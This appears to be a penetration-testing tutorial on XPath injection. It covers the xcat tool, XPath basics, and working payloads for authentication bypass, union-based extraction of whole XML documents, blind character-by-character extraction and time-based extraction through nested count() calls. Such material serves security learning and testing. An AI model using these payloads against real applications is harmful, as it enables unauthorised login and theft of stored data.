XPath Injection

XML Path Language (XPath) is a query language to retrieve data from XML documents, typically used in web application that retrieve data stored in an XML format.

When applications allow user input to be inserted in XPath queries without proper sanitization, it is possible to successfully exploit this vulnerability to retrieve the entire XML document, meaning an attacker will get access to all data stored inside the document.

Automatic Injection using XCAT

pip3 install cython
pip3 install xcat

Usage: xcat [OPTIONS] COMMAND [ARGS]...

The commands are:
 detect: detect and print the type of injection found
 injections: print all types of injection supported by xcat
 ip: print the current external IP address
 run: retrieve the XML document by exploiting the XPath injection
 shell: xcat shell to run system commands

Find more info on commands using:
 xcat <command> --help.

Detect if a non-blind endpoint is vulnerable to XPath Injection: xcat detect <url> <vulnerable-param> param1=value1 param2=value2 --true-string='invalid-input-string'

Exfiltrate the XML document (via POST request): xcat run <url> <vulnerable-param> param1=value1 --true-string=successfully -m POST --encode FORM


XPath Fundamentals

Basic Concepts

XML documents contain data formatted in a tree structure of nodes with the top element being the root element node. Each node aside from the root has exactly one parent node, while each element node may have an arbitrary number of child nodes.

Nodes with the same parent are called sibling nodes. Traversing upwards or downwards from a given node determines all its ancestor nodes or descendant nodes.

An example XML document would be the following:

<?xml version="1.0" encoding="UTF-8"?>
<bookstore>
  <book>
    <title lang="en">The name of the rose</title>
    <author>Umberto Eco</author>
    <price currency="dollar">5,00</price>
    <category>Novel</category>
  </book>
</bookstore>

In the example:

  • bookstore is the root element node.

  • title, author, price and category are element nodes.

  • lang and currency are attribute nodes.

  • title, author, price and category are siblings, with book being their parent.

Selecting Data

Each XPath query selects a set of nodes from the XML document. A query is evaluated from a context node, which marks its starting point. This means that, depending on the context node, the same query may have different results.

The following notes only consider the abbreviated syntax. For more details on the XPath syntax, look at the W3C specification.

There are several ways to select nodes in XPath. Some basic example queries are:

Query
Explanation

example

Select all example child nodes of the context node

/

Select the document root node

//

Select descendant nodes of the context node

.

Select the context node

..

Select the parent node of the context node

@attributeName

Select the attributeName attribute node of the context node

text()

Select all text node child nodes of the context node

query1 | query2

Combine multiple queries with the union operator

Starting from the previous basic queries, it is possible to construct more complex queries, such as:

  • /bookstore/book - Select all book child nodes of the bookstore node

  • /bookstore//title - Select all title nodes that are descendant of the bookstore node

  • /bookstore/book/price/@currency - Select all currency attribute nodes of all price nodes under book elements that are child nodes of the bookstore node

  • //book - Select all books

  • //@currency - Select all currency attribute nodes

Filtering data via Predicates

Predicates filter the result from an XPath query similar to the WHERE clause in a SQL query.

Predicates are part of the XPath query and are contained within []. Some examples are:

  • Select /bookstore/book[1]- Select the first book from the bookstore node

  • /bookstore/book[position()<10] - Select the first 9 books

  • //book/title[@lang]/../category - Select the category of all books with a title having a language

It is also possible to use wildcards such as

  • node() - Matches any node

  • * - Matches any element node

  • @* - Matches any attribute node


Authentication Bypass

An application might implement authentication via XML data containing all users' credentials.

In this case, to perform authentication, the web application might execute an XPath queries to check for the user data, such as the following:

/users/user[username/text()='<username>' and password/text()='<password>'

In this case, if no checks are performed on user input, it is easily possible to bypass authentication using a query that always evaluates to true, such as

username = ' or '1'='1
password = ' or '1'='1

resulting query:
/users/user[username/text()='' or '1'='1' and password/text()='' or '1'='1']

This will allow us to login as the first user inside the XML-data.

If known, it is possible to inject a valid username and a true condition for the password, such as

username = administrator
password = ' or '1'='1

resulting query:
/users/user[username/text()='administrator' and password/text()='' or '1'='1']

In more realistic cases, we might not know any valid username. Also, the password is most probably hashed, meaning that the password payload will be hashed. For example:

username = ' or '1'='1
password = ' or '1'='1

resulting query:
/users/user[username/text()='' or '1'='1' and password/text()='<MD5-hash>']

To properly bypass authentication in these cases, we can inject a double or condition to gain a universally true condition, for example:

username = ' or true() or '
password = ' or '1'='1

/users/user[username/text()='' or true() or '' and password/text()='<MD5-hash>']

Again, this will make us login as the first user in the XML-data. To login as another user without knowing their username, we might use the position() operator:

username = ' or position()=2 or '
password = ' or '1'='1

/users/user[username/text()='' or position()=2 or '' and password/text()='<MD5-hash>']

Lastly, we can use the contains() operator to find all usernames containing a specific substring. This allows targeting accounts containing a specific word in their usernames (which we might know).

username = ' or contains(.,'admin') or '
password = ' or '1'='1

/users/user[username/text()='' or contains(.,'admin') or '' and password/text()='<MD5-hash>']

Data Exfiltration

Union Based

We can try to access arbitrary data from XML documents using techniques similar to UNION-based SQL injections. For this example, consider a bookstore web application with a search functionality that uses two GET parameters:

  • ?q=<input> - finds books containing the user's search string.

  • &f=<input> - selects a property of the book to display (example: title)

By analyzing the web application's behavior, we can deduce the performed XPath query:

/a/b/c/[contains(d/text(), 'q')]/f

which, considering an HTTP request such as:

GET /search.php?q=harrypotter&f=title HTTP/1.1

would turn to:

/a/b/c/[contains(d/text(), 'harrypotter')]/title

Since we do not know the names nor the depth of the element nodes in the XML document, we will make an educated guess and denote the path by single character placeholder names a, b, c, and d. We will discuss how to determine the schema depth in the next section.

The search string we provide in the GET parameter q is inserted in the predicate that filters the books using the contains function. After that, the GET parameter f determines the property the web application displays from all matching books (title, for example), which is why it is appended at the end of the query.

We can confirm XPath injection by sending the payload a') or ('1'='1 in the q parameter and leaving the f parameter to title. This would result in the following XPath query:

/a/b/c/[contains(d/text(), 'a') or ('1'='1')]/title

While our provided substring is invalid, the injected or clause evaluates to true such that the predicate becomes universally true. Therefore, it matches all nodes at that depth. With this payload, the web application responds with all book titles, thus confirming the XPath injection vulnerability

The next step is to construct a query that returns the entire XML document. The simplest is to append a new query that returns all text nodes:

GET /search.php?q=SOMETHINGINVALID&f=title+|+//text() HTTP/1.1

The web application will then execute the following query:

/a/b/c/[contains(d/text(), 'SOMETHINGINVALID')]/title | //text()

We are appending a second query with the | operator, similar to a UNION-based SQL injection. The second query, //text(), returns all text nodes in the XML document. Therefore, the response contains all data stored in the XML document.

Identifying the Schema Depth

It isn't always possible to leverage a query to directly extract all the document's data in one shot: an XPath query may only return a limited number of results - in that case, you can only access one information at a time.

To exfiltrate all the document's data in this scenario, we need to gain information about the schema's structure and depth. We can gain information about the schema's structure and depth using an iterative process where we inject queries that ensure the original XPath query returns no results and, each time, appending a new query that gives us information about the schema depth.

In particular, we can inject a union query operator followed by a subquery which starts from the document root element node: <XPath Query> | /*[1]

By doing that, the web application will most probably not return data: the web application expects a single return value, but the injected query returns the entirety of the document root element node, which is an array.

We can understand the depth of the XML document by iteratively appending an additional /*[1] to the subquery until the behavior of the web application changes:

<XPath Query> | /*[1]
<XPath Query> | /*[1]/*[1]
<XPath Query> | /*[1]/*[1]/*[1]
<XPath Query> | /*[1]/*[1]/*[1]/*[1]
.....

Once the web application finally returns some data, we can deduce that the schema is at least equal to the amount of appended payloads.

To return all the information in the element nodes, we need to find the element node names by iterating the previous payload and changing the first child to the second, then the third and so on:

<XPath Query> | /*[1]/*[1]/*[1]/*[1]
<XPath Query> | /*[1]/*[1]/*[1]/*[2]
<XPath Query> | /*[1]/*[1]/*[1]/*[3]
<XPath Query> | /*[1]/*[1]/*[1]/*[4]
.....

To exfiltrate an entire XML document in this way, it makes to write down a script that performs the iterative steps automatically.

Iterating this process for all element nodes will allow access the entire XML document.

Example iteration: 
<XPath Query> | /*[1]/*[1]/*[1]/*[1]
<XPath Query> | /*[1]/*[1]/*[1]/*[2]
.....
<XPath Query> | /*[1]/*[1]/*[2]/*[1]
<XPath Query> | /*[1]/*[1]/*[2]/*[2]
<XPath Query> | /*[1]/*[1]/*[2]/*[2]
.....
<XPath Query> | /*[1]/*[2]/*[1]/*[1]
<XPath Query> | /*[1]/*[2]/*[1]/*[2]
.....

Blind Exfiltration

Similarly to Blind SQL Injections, the web application may not display the query results to us, but it may still be possible to exfiltrate data. Differently from SQL, there is no sleep function in XPath, so we need other indicators that tell us whether the XPath query was injected.

The idea behind the blind exfiltration process is to enumerate the name of element nodes to construct XPath queries without wildcards to narrow our queries to target interesting data points.

There are 4 functions that can help with this process:

  • name(): allows determining a node's name

  • substring(): exfiltrate a node name one character at a time

  • string-length(): determine the length of a node name to know when to stop the exfiltration

  • count(): returns the number of children of an element node.

Consider an example web application that allows users to chat. The web applications start a chat with a user via the page chat.php?username=sfoffo

If a chat is started with an invalid username, the web application prints an error message. If the username is valid, the chat page is opened. This is a difference in responses that we need to consider to properly perform the blind exfiltration

Since the application performs a user existance check, we can guess the underlying XPath query is similar to the following: /users/user[username='input']. To confirm, we can use a payload such as invalid' or '1'='1 to gain the query: /users/user[username='invalid' or '1'='1']. The application will then act like a valid username was found, since the check returns true.

1. Exfiltrating the Length of a Node Name

To exfiltrate the length of the root node's name, we can use the payload

Payload:
 invalid' or string-length(name(/*[1]))=1 and '1'='1

Full Query:
 /users/user[username='invalid' or string-length(name(/*[1]))=1 and '1'='1']

this query returns data only if string-length(name(/*[1]))=1 is true, meaning the length of the root element node's name is 1. The previous query needs to be iterated until the application's response is the same as for a valid username.

2. Exfiltrating a Node Name

Now that we know the length of the node's name, we can exfiltrate the name character by character.

To do that, we need to use

Payload:
 invalid' or substring(name(/*[1]),1,1)='a' and '1'='1

Full Query:
 /users/user[username='invalid' or substring(name(/*[1]),1,1)='a' and '1'='1']

The query returns data only if the first character of the root node's name equals to a. This query needs to be iterated for all character until the web application's response is valid.

Finally, the payload needs to be iterated for the next character positions to find the entire node name:

invalid' or substring(name(/*[1]),2,1)='<letter>' and '1'='1
invalid' or substring(name(/*[1]),3,1)='<letter>' and '1'='1
invalid' or substring(name(/*[1]),4,1)='<letter>' and '1'='1
invalid' or substring(name(/*[1]),5,1)='<letter>' and '1'='1'

3. Exfiltrating the Number of Child Nodes

To determine the number of child nodes for a given node, we can use the count() function in a payload:

Payload:
 invalid' or count(/users/*)=1 and '1'='1

Full Query:
 /users/user[username='invalid' or count(/users/*)=1 and '1'='1']

This query returns data if we successfully found the number of child nodes of the node.

After exfiltrating the number of child nodes, you can repeat the entire process to find the entire document's structure.

4. Exfiltrating Data

After you have identified the XML document structure, you can proceed with data exfiltration using the same ideas already mentioned.

The first step is to find the number of characters of the first username

Payload:
 invalid' or string-length(/users/user[1]/username)=1 and '1'='1

Full Query:
 /users/user[username='invalid' or string-length(/users/user[1]/username)=1 and '1'='1']

Then, find all characters of the username based on the amount of letters it contains:

Payload:
 invalid' or substring(/users/user[1]/username,1,1)='a' and '1'='1, resulting in the following XPath query:

Full Query:
 /users/user[username='invalid' or substring(/users/user[1]/username,1,1)='a' and '1'='1']

Finally, iterate through all characters until the entire username is exfiltrated.

Time-Based Exploitation

In fully blind scenarios (where the response is the same whether the input is valid or not), it is possible to abuse the processing time of the web application to create behavior similar to a sleep function.

In particular, you can force the web application to iterate over the entire XML document by recursively calling the count function with stacked predicates to force the web application to iterate over all nodes in the XML document exponentially, wasting a lot of time.

Consider a payload such as the following:

Payload:
invalid' or substring(/users/user[1]/username,1,1)='a' and count((//.)[count((//.))]) and '1'='1

Full Query:
/users/user[username='invalid' or substring(/users/user[1]/username,1,1)='a' and count((//.)[count((//.))]) and '1'='1']

If the condition substring(/users/user[1]/username,1,1)='a' is true, the second part of the and clause will be evaluated, meaning that the double count will exponentially iterate over the XML document, causing a large time delay. If the conditions is false, the exponential count will not start, meaning that the first character of the username is not a.

Using this idea, we can exfiltrate all the XML document's data.